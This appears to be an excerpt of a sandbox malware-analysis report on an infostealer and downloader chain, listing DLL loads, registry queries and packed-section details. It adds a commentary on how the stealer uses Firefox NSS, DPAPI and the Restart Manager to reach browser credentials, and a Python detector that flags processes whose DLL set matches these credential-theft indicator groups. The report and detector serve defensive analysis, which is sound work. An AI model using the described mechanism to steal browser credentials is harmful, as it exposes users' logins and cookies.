Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: apphelp.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: winmm.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: wininet.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: sspicli.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: uxtheme.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: mstask.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: windows.storage.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: wldp.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: mpr.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: dui70.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: duser.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: chartv.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: oleacc.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: atlthunk.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: textinputframework.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: coreuicomponents.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: coremessaging.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: ntmarta.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: wintypes.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: wtsapi32.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: winsta.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: textshaping.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: propsys.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: explorerframe.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: iertutil.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: profapi.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: edputil.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: urlmon.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: srvcli.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: netutils.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: appresolver.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: bcp47langs.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: slc.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: userenv.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: sppc.dll
Source: C:\Users\userKFHCAEGCBF.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: 8NjcvPNvUr.exe Static file information: File size 1955840 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 8NjcvPNvUr.exe Static PE information: Raw size of lybfcffv is bigger than: 0x100000 < 0x1ac000
Source: Binary string: mozglue.pdbP source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: nss3.pdb@ source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: mozglue.pdb source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
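The "Section loaded" entries above are more useful than they look. 8ec8c5c339.exe, a binary running out of %TEMP%, maps mozglue.dll (with nss3.pdb and mozglue.pdb path strings in its memory), dpapi.dll and rstrtmgr.dll. Those are the three libraries an infostealer needs for browser credential theft: Firefox's NSS libraries to decrypt logins.json, CryptUnprotectData (DPAPI) for Chromium "Login Data" and cookie databases, and the Restart Manager to release the file locks a running browser holds on those databases. Likewise 8NjcvPNvUr.exe loads mstask.dll and queries CLSID {148BD52A-A2AB-11CE-B11F-00AA00530503}, which is CLSID_CTaskScheduler, the legacy Task Scheduler COM server, consistent with scheduled-task persistence. The script below is an added example, not part of the report or of any vendor tooling: it parses lines in the report's own format, groups loaded DLLs per process and flags untrusted-path processes whose DLL set matches these indicator groups. The indicator groupings and the sample lines are the editor's own construction; the trusted-path rule (Program Files and Windows) is an assumption that suits this report and would need tuning elsewhere.

```python
import re
from collections import OrderedDict

# Matches the report's "Section loaded" entries; a trailing "Jump to behavior" link label is ignored.
SECTION_LOADED_RE = re.compile(r"^Source: (?P<process>.+?) Section loaded: (?P<dll>\S+)")

# Editor's own indicator groups (assumption, not from the report): DLLs an infostealer needs
# for credential theft or persistence when they are loaded by an untrusted binary.
INDICATOR_GROUPS = {
    "firefox-nss": {"mozglue.dll", "nss3.dll", "softokn3.dll", "freebl3.dll"},  # logins.json decryption
    "dpapi": {"dpapi.dll"},               # CryptUnprotectData for Chromium Login Data / cookies
    "restart-manager": {"rstrtmgr.dll"},  # RmStartSession/RmGetList to free locked browser DBs
    "task-scheduler": {"mstask.dll"},     # legacy Task Scheduler client (scheduled-task persistence)
}

# Constructed sample input, in the shape of the report's entries (a few lines copied, one made up).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: rstrtmgr.dll Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ncrypt.dll Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: dpapi.dll Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: mozglue.dll",
    r"Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: vcruntime140.dll",
    r"Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: vcruntime140.dll",
    r"Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: wininet.dll Jump to behavior",
    r"Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: mstask.dll Jump to behavior",
    r"Source: C:\Program Files\Mozilla Firefox\firefox.exe Section loaded: mozglue.dll",
    r"Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes Jump to behavior",
]


def loaded_dlls(lines):
    """Map each process path to the ordered, de-duplicated list of DLLs it loaded."""
    per_process = OrderedDict()
    for line in lines:
        m = SECTION_LOADED_RE.match(line)
        if not m:
            continue  # other event types (registry, file, process) are not DLL loads
        dlls = per_process.setdefault(m["process"], [])
        dll = m["dll"].lower()
        if dll not in dlls:
            dlls.append(dll)
    return per_process


def is_trusted_location(process_path):
    """Firefox loading mozglue.dll is expected; the same DLL inside a %TEMP% binary is not.
    Assumption: only Program Files and Windows count as trusted install locations."""
    lowered = process_path.lower()
    return lowered.startswith("c:\\program files") or lowered.startswith("c:\\windows")


def stealer_profile(lines):
    """Return {process_path: sorted indicator group names} for untrusted processes with hits."""
    hits = {}
    for process, dlls in loaded_dlls(lines).items():
        if is_trusted_location(process):
            continue
        groups = sorted(name for name, members in INDICATOR_GROUPS.items() if members & set(dlls))
        if groups:
            hits[process] = groups
    return hits


if __name__ == "__main__":
    for process, groups in stealer_profile(SAMPLE_LINES).items():
        print(f"{process}: {', '.join(groups)}")
```

Run against the full report text, the same function also shows what the generic loader processes (explorti.exe, axplong.exe) do not load: no NSS, no DPAPI, no Restart Manager, only the WinINet/WinHTTP networking stack, which matches their role as downloaders rather than stealers.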

Data Obfuscation

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Unpacked PE file: 0.2.8NjcvPNvUr.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 1.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 7.2.explorti.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Unpacked PE file: 9.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.casiwid:R;.mufu:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Unpacked PE file: 12.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Unpacked PE file: 15.2.RoamingHJDBKJKFIE.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lybfcffv:EW;emchirzz:EW;.taggant:EW;
Source: C:\Users\userKFHCAEGCBF.exe Unpacked PE file: 18.2.userKFHCAEGCBF.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 19.2.axplong.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.casiwid:R;.mufu:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Unpacked PE file: 31.2.1c593ec106.exe.390000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 37.2.axplong.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;finyobjn:EW;cveoqpqu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 8_2_0041BA2C
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 8NjcvPNvUr.exe Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: random[1].exe.8.dr Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: 1c593ec106.exe.7.dr Static PE information: real checksum: 0x12ca13 should be: 0x314e69
Source: userKFHCAEGCBF.exe.8.dr Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd
Source: random[1].exe0.7.dr Static PE information: real checksum: 0x12ca13 should be: 0x314e69
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: real checksum: 0x1e73b4 should be: 0x1e21d9
Source: axplong.exe.18.dr Static PE information: real checksum: 0x1d5ef2 should be: 0x1cd7cd
Source: 8NjcvPNvUr.exe Static PE information: section name:
Source: 8NjcvPNvUr.exe Static PE information: section name: .idata
Source: 8NjcvPNvUr.exe Static PE information: section name:
Source: 8NjcvPNvUr.exe Static PE information: section name: lybfcffv
Source: 8NjcvPNvUr.exe Static PE information: section name: emchirzz
Source: 8NjcvPNvUr.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: lybfcffv
Source: explorti.exe.0.dr Static PE information: section name: emchirzz
Source: explorti.exe.0.dr Static PE information: section name: .taggant
